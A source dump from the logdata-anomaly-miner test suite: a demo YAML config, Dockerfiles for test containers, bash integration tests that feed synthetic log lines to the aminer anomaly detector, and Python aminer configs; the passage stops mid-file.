logdata-anomaly-miner-2.8.0/aecid-testsuite/demo/aminerXmlInputDemo/xml-input-demo-config.yml000066400000000000000000000044111500476301700323530ustar00rootroot00000000000000LearnMode: True Core.LogDir: '/tmp/lib/aminer/log' Core.PersistenceDir: '/tmp/lib/aminer' Core.PersistencePeriod: 600 LogResourceList: - 'file:///tmp/syslog' MailAlerting.TargetAddress: 'root@localhost' MailAlerting.FromAddress: 'root@localhost' MailAlerting.SubjectPrefix: 'aminer Alerts:' MailAlerting.AlertGraceTime: 0 MailAlerting.EventCollectTime: 0 MailAlerting.MinAlertGap: 0 MailAlerting.MaxAlertGap: 600 MailAlerting.MaxEventsPerMessage: 1000 LogPrefix: 'Original log line: ' Log.StatisticsPeriod: 3600 Log.StatisticsLevel: 1 Log.DebugLevel: 1 Parser: - id: id type: DecimalIntegerValueModelElement name: 'id' - id: opt type: FixedDataModelElement name: 'opt' args: 'text' - id: to type: AnyByteDataModelElement name: 'to' - id: from type: AnyByteDataModelElement name: 'from' - id: heading type: AnyByteDataModelElement name: 'heading' - id: text1 type: AnyByteDataModelElement name: 'text1' - id: text2 type: AnyByteDataModelElement name: 'text2' - id: xml start: True type: XmlModelElement name: 'model' xml_header_expected: True key_parser_dict: messages: - note: +id: id _+opt: opt to: to from: from ?heading: heading body: text1: text1 text2: text2 Input: timestamp_paths: None xml_format: True Analysis: - type: NewMatchPathValueComboDetector id: NewMatchPathValueCombo paths: - "/model/messages/note/id/id" - "/model/messages/note/opt/opt" learn_mode: True output_logline: True - type: NewMatchPathValueDetector id: NewMatchPathValue paths: - "/model/messages/note/id/id" - "/model/messages/note/opt/opt" learn_mode: True output_logline: True - type: SimpleUnparsedAtomHandler id: SimpleUnparsedAtomHandler EventHandlers: - id: stpe type: StreamPrinterEventHandler 
logdata-anomaly-miner-2.8.0/aecid-testsuite/docker/000077500000000000000000000000001500476301700222505ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/aecid-testsuite/docker/Dockerfile_deb000066400000000000000000000032641500476301700250610ustar00rootroot00000000000000# syntax=docker/dockerfile:1 # check=skip=InvalidDefaultArgInFrom # Pull base image. ARG vardistri FROM $vardistri ARG varbranch ENV BRANCH=$varbranch # Set local timezone ENV TZ=Europe/Vienna RUN ln -snf /usr/share/zoneinfo/$TZ /etc/localtime && echo $TZ > /etc/timezone LABEL maintainer="wolfgang.hotwagner@ait.ac.at" # Install necessary debian packages ARG DEBIAN_FRONTEND=noninteractive RUN apt-get update && apt-get install -y --no-install-recommends apt-utils RUN apt-get update && apt-get install -y \ ansible \ git \ vim \ postfix \ procps \ cpulimit \ mailutils \ postfix \ rsyslog \ sudo \ curl \ apache2 \ locales \ locales-all RUN sed -i -e 's/# en_US.UTF-8 UTF-8/en_US.UTF-8 UTF-8/' /etc/locale.gen && \ dpkg-reconfigure --frontend=noninteractive locales && \ update-locale LANG=en_US.UTF-8 ENV LANG=en_US.UTF-8 ENV LANGUAGE=en_US:en ENV LC_ALL=en_US.UTF-8 ADD . 
/home/aminer/logdata-anomaly-miner RUN cd /home/aminer/logdata-anomaly-miner && scripts/aminer_install.sh -b $varbranch -s /home/aminer/logdata-anomaly-miner ADD scripts/distritest.sh /distritest.sh RUN chmod 755 /distritest.sh RUN git clone -b $varbranch https://github.com/ait-aecid/logdata-anomaly-miner.wiki.git /opt/wiki RUN awk '/^```yaml$/ && ++n == 1, /^```$/' < /opt/wiki/Getting-started-\(tutorial\).md | sed '/^```/ d' | sed '/^```python/ d' > /home/aminer/gettingStarted-config.yml RUN ln -s /etc/aminer/conf-available/generic/ApacheAccessModel.py /etc/aminer/conf-enabled/ RUN echo "aminer ALL=(ALL) NOPASSWD:ALL" > /etc/sudoers.d/aminer USER aminer WORKDIR /home/aminer ENTRYPOINT ["/distritest.sh"] logdata-anomaly-miner-2.8.0/aecid-testsuite/docker/Dockerfile_fed000066400000000000000000000026111500476301700250600ustar00rootroot00000000000000# Pull base image. FROM fedora:latest ARG varbranch ENV BRANCH=$varbranch # Set local timezone ENV TZ=Europe/Vienna RUN ln -snf /usr/share/zoneinfo/$TZ /etc/localtime && echo $TZ > /etc/timezone LABEL maintainer="wolfgang.hotwagner@ait.ac.at" # Install necessary dnf packages RUN dnf install -y \ ansible \ git \ vim \ postfix \ procps \ cpulimit \ sendmail \ sendmail-cf \ postfix \ rsyslog \ sudo \ curl \ httpd \ glibc-locale-source \ glibc-langpack-en ENV LANG=en_US.UTF-8 ENV LANGUAGE=en_US:en ENV LC_ALL=en_US.UTF-8 RUN localedef --force -i en_US -f UTF-8 en_US.UTF-8 ADD . 
/home/aminer/logdata-anomaly-miner RUN cd /home/aminer/logdata-anomaly-miner && scripts/aminer_install.sh -b $varbranch -s /home/aminer/logdata-anomaly-miner ADD scripts/distritest.sh /distritest.sh RUN chmod 755 /distritest.sh RUN git clone -b $varbranch https://github.com/ait-aecid/logdata-anomaly-miner.wiki.git /opt/wiki RUN awk '/^```yaml$/ && ++n == 1, /^```$/' < /opt/wiki/Getting-started-\(tutorial\).md | sed '/^```/ d' | sed '/^```python/ d' > /home/aminer/gettingStarted-config.yml RUN ln -s /etc/aminer/conf-available/generic/ApacheAccessModel.py /etc/aminer/conf-enabled/ RUN echo "aminer ALL=(ALL) NOPASSWD:ALL" > /etc/sudoers.d/aminer USER aminer WORKDIR /home/aminer ENTRYPOINT ["/distritest.sh"] logdata-anomaly-miner-2.8.0/aecid-testsuite/docker/Dockerfile_red000066400000000000000000000035571500476301700251040ustar00rootroot00000000000000# Pull base image. FROM redhat/ubi9 ARG varbranch ENV BRANCH=$varbranch # allow the system to use two package managers (apt and pip), as we do it intentionally (needed since Debian Bookworm - see PEP 668) ENV PIP_BREAK_SYSTEM_PACKAGES=1 # Set local timezone ENV TZ=Europe/Vienna RUN ln -snf /usr/share/zoneinfo/$TZ /etc/localtime && echo $TZ > /etc/timezone LABEL maintainer="wolfgang.hotwagner@ait.ac.at" RUN dnf install https://dl.fedoraproject.org/pub/epel/epel-release-latest-9.noarch.rpm python3-pip sudo -y RUN sudo pip3 install ansible ENV PATH="$PATH:/usr/local/bin" # Install necessary dnf packages RUN dnf install -y --allowerasing \ git \ vim \ postfix \ procps \ cpulimit \ exim \ postfix \ rsyslog \ curl \ httpd \ glibc-locale-source \ glibc-langpack-en \ python3-pylibacl ENV LANG=en_US.UTF-8 ENV LANGUAGE=en_US:en ENV LC_ALL=en_US.UTF-8 RUN localedef --force -i en_US -f UTF-8 en_US.UTF-8 ADD . 
/home/aminer/logdata-anomaly-miner RUN sed -i "s?sudo ansible-playbook playbook.yml?sudo /usr/local/bin/ansible-playbook playbook.yml?g" /home/aminer/logdata-anomaly-miner/scripts/aminer_install.sh RUN cd /home/aminer/logdata-anomaly-miner && scripts/aminer_install.sh -b $varbranch -s /home/aminer/logdata-anomaly-miner ADD scripts/distritest.sh /distritest.sh RUN chmod 755 /distritest.sh RUN git clone -b $varbranch https://github.com/ait-aecid/logdata-anomaly-miner.wiki.git /opt/wiki RUN awk '/^```yaml$/ && ++n == 1, /^```$/' < /opt/wiki/Getting-started-\(tutorial\).md | sed '/^```/ d' | sed '/^```python/ d' > /home/aminer/gettingStarted-config.yml RUN ln -s /etc/aminer/conf-available/generic/ApacheAccessModel.py /etc/aminer/conf-enabled/ RUN echo "aminer ALL=(ALL) NOPASSWD:ALL" > /etc/sudoers.d/aminer USER aminer WORKDIR /home/aminer ENTRYPOINT ["/distritest.sh"] logdata-anomaly-miner-2.8.0/aecid-testsuite/integration/000077500000000000000000000000001500476301700233245ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/aecid-testsuite/integration/aminerIntegrationTest.sh000077500000000000000000000050521500476301700302040ustar00rootroot00000000000000#!/bin/bash #To add more log lines following positions must be changed: main script, checkAllOutputs, isExpectedOutput. The Position is marked with a "ADD HERE" comment. . ../testFunctions.sh . ./declarations.sh AMINER_PERSISTENCE_PATH=/tmp/lib/aminer/* LOGFILE=/tmp/syslog sudo rm -r $AMINER_PERSISTENCE_PATH 2> /dev/null sudo mkdir -p /tmp/lib/aminer/log sudo chown -R aminer:aminer /tmp/lib/aminer 2> /dev/null echo "Integration test started.." echo "" CFG_PATH=/tmp/config.py if ! test -f "$CFG_PATH"; then echo "$CFG_PATH does not exist!" 
exit 1 fi time=`date +%s` #Anomaly FixedDataModel HD Repair ({ date '+%Y-%m-%d %T' && cat /etc/hostname && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrad") > $LOGFILE #New Path ({ date '+%Y-%m-%d %T' && cat /etc/hostname && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrade") >> $LOGFILE #Known Path ({ date '+%Y-%m-%d %T' && cat /etc/hostname && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrade") >> $LOGFILE #Anomaly FixedDataModel HD Repair ({ date '+%Y-%m-%d %T' && cat /etc/hostname && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrad") >> $LOGFILE #Anomaly DateTimeModel ({ date '+%m.%Y %T' && cat /etc/hostname && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrade") >> $LOGFILE #Known Path ({ date '+%Y-%m-%d %T' && cat /etc/hostname && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrade") >> $LOGFILE #Known Path ({ date '+%Y-%m-%d %T' && echo 'fedora' && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrade") >> $LOGFILE #Root Home Path echo 'The Path of the home directory shown by pwd of the user root is: /root' >> $LOGFILE #User Home Path echo 'The Path of the home directory shown by pwd of the user user is: /home/user' >> $LOGFILE #Guest Home Path echo 'The Path of the home directory shown by pwd of the user guest is: /home/guest' >> $LOGFILE #ADD HERE runAminerUntilEnd "sudo aminer --config $CFG_PATH" "$LOGFILE" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "/tmp/output" checkAllOutputs if [ $? == 0 ]; then checkAllMails if [ $? == 0 ]; then echo "" echo "all mails were found in the mailbox!" echo "finished test successfully.." else echo "" echo "test failed at checking mails.." 
exit 1 fi else echo "" echo "test failed at checking outputs.." exit 1 fi exit 0 logdata-anomaly-miner-2.8.0/aecid-testsuite/integration/aminerIntegrationTest2.sh000077500000000000000000000173751500476301700303010ustar00rootroot00000000000000#!/bin/bash #To add more log lines following positions must be changed: main script, checkAllOutputs, isExpectedOutput. The Position is marked with a "ADD HERE" comment. . ./declarations.sh NUMBER_OF_LOG_LINES=7 OUT=/tmp/output SYSLOG=/tmp/syslog AUTH=/tmp/auth.log ZMQ=/tmp/zmq AMINER_PERSISTENCE_PATH=/tmp/lib/aminer/* sudo rm -r $AMINER_PERSISTENCE_PATH 2> /dev/null sudo mkdir -p /tmp/lib/aminer/log sudo chown -R aminer:aminer /tmp/lib/aminer 2> /dev/null sudo rm $SYSLOG 2> /dev/null sudo rm $AUTH 2> /dev/null sudo rm $OUT 2> /dev/null echo "Integration test started.." echo "" CFG_PATH21=/tmp/config21.py if ! test -f "$CFG_PATH21"; then echo "$CFG_PATH21 does not exist!" exit 1 fi CFG_PATH22=/tmp/config22.py if ! test -f "$CFG_PATH22"; then echo "$CFG_PATH22 does not exist!" exit 1 fi #< /dev/null & DOWNLOAD_PID=$! #start aminer sudo aminer --config $CFG_PATH21 > $OUT & PID=$! for i in {1..60}; do grep "INFO aminer started." /tmp/lib/aminer/log/aminer.log > /dev/null 2>&1; if [[ $? 
== 0 ]]; then break; fi; sleep 1; done #Anomaly FixedDataModel HD Repair ({ date '+%Y-%m-%d %T' && cat /etc/hostname && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrad") > $SYSLOG sleep 1 #New Path ({ date '+%Y-%m-%d %T' && cat /etc/hostname && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrade") > $AUTH sleep 1 #Known Path ({ date '+%Y-%m-%d %T' && cat /etc/hostname && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrade") >> $SYSLOG sleep 1 #Anomaly FixedDataModel HD Repair ({ date '+%Y-%m-%d %T' && cat /etc/hostname && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrad") >> $AUTH sleep 1 #Anomaly DateTimeModel ({ date '+%m.%Y %T' && cat /etc/hostname && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrade") >> $SYSLOG sleep 1 #Known Path ({ date '+%Y-%m-%d %T' && cat /etc/hostname && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrade") >> $AUTH sleep 1 #Known Path ({ date '+%Y-%m-%d %T' && echo 'fedora' && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrade") >> $SYSLOG sleep 1 #Root Home Path echo 'The Path of the home directory shown by pwd of the user root is: /root' >> $AUTH sleep 1 #User Home Path echo 'The Path of the home directory shown by pwd of the user user is: /home/user' >> $SYSLOG sleep 1 #Guest Home Path echo 'The Path of the home directory shown by pwd of the user guest is: /home/guest' >> $AUTH #ADD HERE #stop aminer sleep 3 sudo pkill -x aminer.py sudo pkill -x aminer wait $PID checkAllOutputs if [ $? == 0 ]; then checkAllSyslogs if [ $? == 0 ]; then checkAllMails if [ $? == 0 ]; then echo "" echo "all mails were found in the mailbox!" echo "finished test successfully.." else echo "" echo "test failed at checking mails.." 
exit 1 fi else echo "" echo "test failed at checking syslogs.." exit 1 fi else echo "" echo "test failed at checking outputs.." exit 1 fi echo "" echo "part 1 finished" echo "" #END AMINER_PERSISTENCE_PATH=/tmp/lib/aminer/* sudo rm -r $AMINER_PERSISTENCE_PATH 2> /dev/null sudo mkdir -p /tmp/lib/aminer/log sudo chown -R aminer:aminer /tmp/lib/aminer 2> /dev/null sudo rm $SYSLOG 2> /dev/null sudo rm $AUTH 2> /dev/null sudo rm $OUT 2> /dev/null sudo cp ../unit/data/kafka-client.conf /etc/aminer/kafka-client.conf wait $DOWNLOAD_PID tar xvf kafka.tgz > /dev/null rm kafka.tgz $KAFKA_VERSIONSTRING/bin/zookeeper-server-start.sh $KAFKA_VERSIONSTRING/config/zookeeper.properties > /dev/null & sleep 10 $KAFKA_VERSIONSTRING/bin/kafka-server-start.sh $KAFKA_VERSIONSTRING/config/server.properties > /dev/null & sleep 10 COUNTER=0 /usr/lib/logdata-anomaly-miner/.venv/bin/python3 /tmp/zmq_subscriber.py & ZMQ_PID=$! #start aminer sudo aminer --config $CFG_PATH22 > $OUT & PID=$! for i in {1..60}; do grep "INFO aminer started." /tmp/lib/aminer/log/aminer.log > /dev/null 2>&1; if [[ $? == 0 ]]; then break; fi; sleep 1; done #Anomaly FixedDataModel HD Repair ({ date '+%Y-%m-%d %T' && cat /etc/hostname && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrad") > $SYSLOG for i in {1..60}; do grep "System rebooted for hard disk upgrad" $OUT > /dev/null 2>&1; if [[ $? == 0 ]]; then break; fi; sleep 1; done #New Path ({ date '+%Y-%m-%d %T' && cat /etc/hostname && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrade") > $AUTH for i in {1..60}; do grep "System rebooted for hard disk upgrade" $OUT > /dev/null 2>&1; if [[ $? 
== 0 ]]; then break; fi; sleep 1; done #Known Path ({ date '+%Y-%m-%d %T' && cat /etc/hostname && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrade") >> $SYSLOG sleep 3 #Anomaly FixedDataModel HD Repair ({ date '+%Y-%m-%d %T' && cat /etc/hostname && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrad") >> $AUTH sleep 3 #Anomaly DateTimeModel ({ date '+%m.%Y %T' && cat /etc/hostname && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrade") >> $SYSLOG sleep 3 #Known Path ({ date '+%Y-%m-%d %T' && cat /etc/hostname && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrade") >> $AUTH sleep 3 #Known Path ({ date '+%Y-%m-%d %T' && echo 'fedora' && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrade") >> $SYSLOG sleep 3 #Root Home Path echo 'The Path of the home directory shown by pwd of the user root is: /root' >> $AUTH for i in {1..60}; do grep "The Path of the home directory shown by pwd of the user root is: /root" $OUT > /dev/null 2>&1; if [[ $? == 0 ]]; then break; fi; sleep 1; done #User Home Path echo 'The Path of the home directory shown by pwd of the user user is: /home/user' >> $SYSLOG echo 'The Path of the home directory shown by pwd of the user user is: /home/user' >> $SYSLOG for i in {1..60}; do grep "The Path of the home directory shown by pwd of the user user is: /home/user" $OUT > /dev/null 2>&1; if [[ $? == 0 ]]; then break; fi; sleep 1; done #Guest Home Path echo 'The Path of the home directory shown by pwd of the user guest is: /home/guest' >> $AUTH for i in {1..60}; do grep "The Path of the home directory shown by pwd of the user guest is: /home/guest" $OUT > /dev/null 2>&1; if [[ $? 
== 0 ]]; then break; fi; sleep 1; done #ADD HERE #stop aminer sleep 20 sudo pkill -x aminer.py sudo pkill -x aminer wait $PID sleep 15 # leave the kafka handler some time. sudo kill $ZMQ_PID result=0 checkAllOutputs if [ $? == 0 ]; then checkAllSyslogs if [ $? == 0 ]; then checkAllMails if [ $? == 0 ]; then checkKafkaTopic if [ $? == 0 ]; then checkZmqTopic if [ $? == 0 ]; then echo "" echo "all zmq outputs were found!" echo "finished test successfully.." else echo "" echo "test failed at checking zmq topic.." result=1 fi else echo "" echo "test failed at checking kafka topic.." result=1 fi else echo "" echo "test failed at checking mails.." result=1 fi else echo "" echo "test failed at checking syslogs.." result=1 fi else echo "" echo "test failed at checking outputs.." result=1 fi echo "" echo "part 2 finished" sudo $KAFKA_VERSIONSTRING/bin/kafka-server-stop.sh > /dev/null sudo $KAFKA_VERSIONSTRING/bin/zookeeper-server-stop.sh > /dev/null sudo rm -r $KAFKA_VERSIONSTRING/ sudo rm -r /tmp/zookeeper sudo rm -r /tmp/kafka-logs sudo rm /etc/aminer/kafka-client.conf sudo rm /tmp/zmq sudo rm /tmp/aminer exit $result logdata-anomaly-miner-2.8.0/aecid-testsuite/integration/config.py000066400000000000000000000173301500476301700251470ustar00rootroot00000000000000config_properties = {} # Define the list of log resources to read from: the resources # named here do not need to exist when aminer is started. This # will just result in a warning. However if they exist, they have # to be readable by the aminer process! 
Supported types are: # * file://[path]: Read data from file, reopen it after rollover # * unix://[path]: Open the path as UNIX local socket for reading config_properties['LogResourceList'] = ['file:///tmp/syslog'] # Define the uid/gid of the process that runs the calculation # after opening the log files: config_properties['AminerUser'] = 'aminer' config_properties['AminerGroup'] = 'aminer' # Define the path, where aminer will listen for incoming remote # control connections. When missing, no remote control socket # will be created. # config_properties['RemoteControlSocket'] = '/var/run/aminer-remote.socket' # Read the analysis from this file. That part of configuration # is separated from the main configuration so that it can be loaded # only within the analysis child. Non-absolute path names are # interpreted relatively to the main configuration file (this # file). When empty, this configuration has to contain the configuration # for the child also. # config_properties['AnalysisConfigFile'] = 'analysis.py' config_properties['Core.LogDir'] = '/tmp/lib/aminer/log' # Read and store information to be used between multiple invocations # of aminer in this directory. The directory must only be accessible # to the 'AminerUser' but not group/world readable. On violation, # aminer will refuse to start. When undefined, '/var/lib/aminer' # is used. config_properties['Core.PersistenceDir'] = '/tmp/lib/aminer' # Define a target e-mail address to send alerts to. When undefined, # no e-mail notification hooks are added. config_properties['MailAlerting.TargetAddress'] = 'root@localhost' # Sender address of e-mail alerts. When undefined, the "sendmail" # implementation on the host will decide which sender address should # be used. config_properties['MailAlerting.FromAddress'] = 'root@localhost' # Define which text should be prepended to the standard aminer # subject. 
Defaults to "aminer Alerts:" config_properties['MailAlerting.SubjectPrefix'] = 'aminer Alerts:' # Define a grace time after startup before aminer will react to # an event and send the first alert e-mail. Defaults to 0 (any # event can immediately trigger alerting). config_properties['MailAlerting.AlertGraceTime'] = 0 # Define how many seconds to wait after a first event triggered # the alerting procedure before really sending out the e-mail. # In that timespan, events are collected and will be sent all # using a single e-mail. Defaults to 10 seconds. config_properties['MailAlerting.EventCollectTime'] = 0 # Define the minimum time between two alert e-mails in seconds # to avoid spamming. All events during this timespan are collected # and sent out with the next report. Defaults to 600 seconds. config_properties['MailAlerting.MinAlertGap'] = 0 # Define the maximum time between two alert e-mails in seconds. # When undefined this defaults to "MailAlerting.MinAlertGap". # Otherwise this will activate an exponential backoff to reduce # messages during permanent error states by increasing the alert # gap by 50% when more alert-worthy events were recorded while # the previous gap time was not yet elapsed. config_properties['MailAlerting.MaxAlertGap'] = 600 # Define how many events should be included in one alert mail # at most. This defaults to 1000 config_properties['MailAlerting.MaxEventsPerMessage'] = 1000 config_properties['LogPrefix'] = 'Original log line: ' # Add your ruleset here: def build_analysis_pipeline(analysis_context): """ Define the function to create pipeline for parsing the log data. It has also to define an AtomizerFactory to instruct aminer how to process incoming data streams to create log atoms from them. 
""" # Build the parsing model: from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement service_children_disk_upgrade = [ DateTimeModelElement('DTM', b'%Y-%m-%d %H:%M:%S'), FixedDataModelElement('UNameSpace1', b' '), DelimitedDataModelElement('UName', b' '), FixedDataModelElement('UNameSpace2', b' '), DelimitedDataModelElement('User', b' '), FixedDataModelElement('HDRepair', b' System rebooted for hard disk upgrade')] service_children_home_path = [ FixedDataModelElement('Pwd', b'The Path of the home directory shown by pwd of the user '), DelimitedDataModelElement('Username', b' '), FixedDataModelElement('Is', b' is: '), AnyByteDataModelElement('Path')] parsing_model = FirstMatchModelElement('model', [ SequenceModelElement('DiskUpgrade', service_children_disk_upgrade), SequenceModelElement('HomePath', service_children_home_path)]) # Some generic imports. from aminer.analysis import AtomFilters # Create all global handler lists here and append the real handlers later on. # Use this filter to distribute all atoms to the analysis handlers. atom_filter = AtomFilters.SubhandlerFilter(None) from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler stream_printer_event_handler = StreamPrinterEventHandler(analysis_context) anomaly_event_handlers = [stream_printer_event_handler] # Now define the AtomizerFactory using the model. A simple line based one is usually sufficient. 
from aminer.input.SimpleByteStreamLineAtomizerFactory import SimpleByteStreamLineAtomizerFactory analysis_context.atomizer_factory = SimpleByteStreamLineAtomizerFactory(parsing_model, [atom_filter], anomaly_event_handlers, use_real_time=True) # Just report all unparsed atoms to the event handlers. from aminer.analysis.UnparsedAtomHandlers import SimpleUnparsedAtomHandler simple_unparsed_atom_handler = SimpleUnparsedAtomHandler(anomaly_event_handlers) atom_filter.add_handler(simple_unparsed_atom_handler, stop_when_handled_flag=True) analysis_context.register_component(simple_unparsed_atom_handler, component_name="UnparsedHandler") from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector new_match_path_detector = NewMatchPathDetector(analysis_context.aminer_config, anomaly_event_handlers, learn_mode=True) analysis_context.register_component(new_match_path_detector, component_name="NewPath") atom_filter.add_handler(new_match_path_detector) from aminer.analysis.NewMatchPathValueComboDetector import NewMatchPathValueComboDetector new_match_path_value_combo_detector = NewMatchPathValueComboDetector(analysis_context.aminer_config, [ '/model/HomePath/Username', '/model/HomePath/Path'], anomaly_event_handlers, learn_mode=True) analysis_context.register_component(new_match_path_value_combo_detector, component_name="NewValueCombo") atom_filter.add_handler(new_match_path_value_combo_detector) # Include the e-mail notification handler only if the configuration parameter was set. 
from aminer.events.DefaultMailNotificationEventHandler import DefaultMailNotificationEventHandler if DefaultMailNotificationEventHandler.CONFIG_KEY_MAIL_TARGET_ADDRESS in analysis_context.aminer_config.config_properties: mail_notification_handler = DefaultMailNotificationEventHandler(analysis_context) analysis_context.register_component(mail_notification_handler, component_name="MailHandler") anomaly_event_handlers.append(mail_notification_handler) logdata-anomaly-miner-2.8.0/aecid-testsuite/integration/config21.py000066400000000000000000000203011500476301700253020ustar00rootroot00000000000000config_properties = {} # Define the list of log resources to read from: the resources # named here do not need to exist when aminer is started. This # will just result in a warning. However if they exist, they have # to be readable by the aminer process! Supported types are: # * file://[path]: Read data from file, reopen it after rollover # * unix://[path]: Open the path as UNIX local socket for reading config_properties['LogResourceList'] = ['file:///tmp/syslog', 'file:///tmp/auth.log'] # Define the uid/gid of the process that runs the calculation # after opening the log files: config_properties['AminerUser'] = 'aminer' config_properties['AminerGroup'] = 'aminer' # Define the path, where aminer will listen for incoming remote # control connections. When missing, no remote control socket # will be created. # config_properties['RemoteControlSocket'] = '/var/run/aminer-remote.socket' # Read the analyis from this file. That part of configuration # is separated from the main configuration so that it can be loaded # only within the analysis child. Non-absolute path names are # interpreted relatively to the main configuration file (this # file). When empty, this configuration has to contain the configuration # for the child also. 
# config_properties['AnalysisConfigFile'] = 'analysis.py' config_properties['Core.LogDir'] = '/tmp/lib/aminer/log' # Read and store information to be used between multiple invocations # of aminer in this directory. The directory must only be accessible # to the 'AminerUser' but not group/world readable. On violation, # aminer will refuse to start. When undefined, '/var/lib/aminer' # is used. config_properties['Core.PersistenceDir'] = '/tmp/lib/aminer' # Define a target e-mail address to send alerts to. When undefined, # no e-mail notification hooks are added. config_properties['MailAlerting.TargetAddress'] = 'root@localhost' # Sender address of e-mail alerts. When undefined, "sendmail" # implementation on host will decide, which sender address should # be used. config_properties['MailAlerting.FromAddress'] = 'root@localhost' # Define, which text should be prepended to the standard aminer # subject. Defaults to "aminer Alerts:" config_properties['MailAlerting.SubjectPrefix'] = 'aminer Alerts:' # Define a grace time after startup before aminer will react to # an event and send the first alert e-mail. Defaults to 0 (any # event can immediately trigger alerting). config_properties['MailAlerting.AlertGraceTime'] = 0 # Define how many seconds to wait after a first event triggered # the alerting procedure before really sending out the e-mail. # In that timespan, events are collected and will be sent all # using a single e-mail. Defaults to 10 seconds. config_properties['MailAlerting.EventCollectTime'] = 0 # Define the minimum time between two alert e-mails in seconds # to avoid spamming. All events during this timespan are collected # and sent out with the next report. Defaults to 600 seconds. config_properties['MailAlerting.MinAlertGap'] = 0 # Define the maximum time between two alert e-mails in seconds. # When undefined this defaults to "MailAlerting.MinAlertGap". 
# Otherwise this will activate an exponential backoff to reduce # messages during permanent error states by increasing the alert # gap by 50% when more alert-worthy events were recorded while # the previous gap time was not yet elapsed. config_properties['MailAlerting.MaxAlertGap'] = 600 # Define how many events should be included in one alert mail # at most. This defaults to 1000 config_properties['MailAlerting.MaxEventsPerMessage'] = 1000 config_properties['LogPrefix'] = 'Original log line: ' # Add your ruleset here: def build_analysis_pipeline(analysis_context): """ Define the function to create pipeline for parsing the log data. It has also to define an AtomizerFactory to instruct aminer how to process incoming data streams to create log atoms from them. """ # Build the parsing model: from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement service_children_disk_upgrade = [ DateTimeModelElement('DTM', b'%Y-%m-%d %H:%M:%S'), FixedDataModelElement('UNameSpace1', b' '), DelimitedDataModelElement('UName', b' '), FixedDataModelElement('UNameSpace2', b' '), DelimitedDataModelElement('User', b' '), FixedDataModelElement('HDRepair', b' System rebooted for hard disk upgrade')] service_children_home_path = [ FixedDataModelElement('Pwd', b'The Path of the home directory shown by pwd of the user '), DelimitedDataModelElement('Username', b' '), FixedDataModelElement('Is', b' is: '), AnyByteDataModelElement('Path')] parsing_model = FirstMatchModelElement('model', [ SequenceModelElement('DiskUpgrade', service_children_disk_upgrade), SequenceModelElement('HomePath', service_children_home_path)]) # Some 
generic imports. from aminer.analysis import AtomFilters # Create all global handler lists here and append the real handlers later on. # Use this filter to distribute all atoms to the analysis handlers. atom_filter = AtomFilters.SubhandlerFilter(None) from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler stream_printer_event_handler = StreamPrinterEventHandler(analysis_context) from aminer.events.SyslogWriterEventHandler import SyslogWriterEventHandler syslog_writer_event_handler = SyslogWriterEventHandler(analysis_context) anomaly_event_handlers = [stream_printer_event_handler, syslog_writer_event_handler] from aminer.input.SimpleMultisourceAtomSync import SimpleMultisourceAtomSync simple_multisource_atom_sync = SimpleMultisourceAtomSync([atom_filter], 9) analysis_context.register_component(simple_multisource_atom_sync, component_name="SimpleMultisourceAtomSync") # Now define the AtomizerFactory using the model. A simple line # based one is usually sufficient. from aminer.input.SimpleByteStreamLineAtomizerFactory import SimpleByteStreamLineAtomizerFactory analysis_context.atomizer_factory = SimpleByteStreamLineAtomizerFactory( parsing_model, [simple_multisource_atom_sync], anomaly_event_handlers) # Just report all unparsed atoms to the event handlers. 
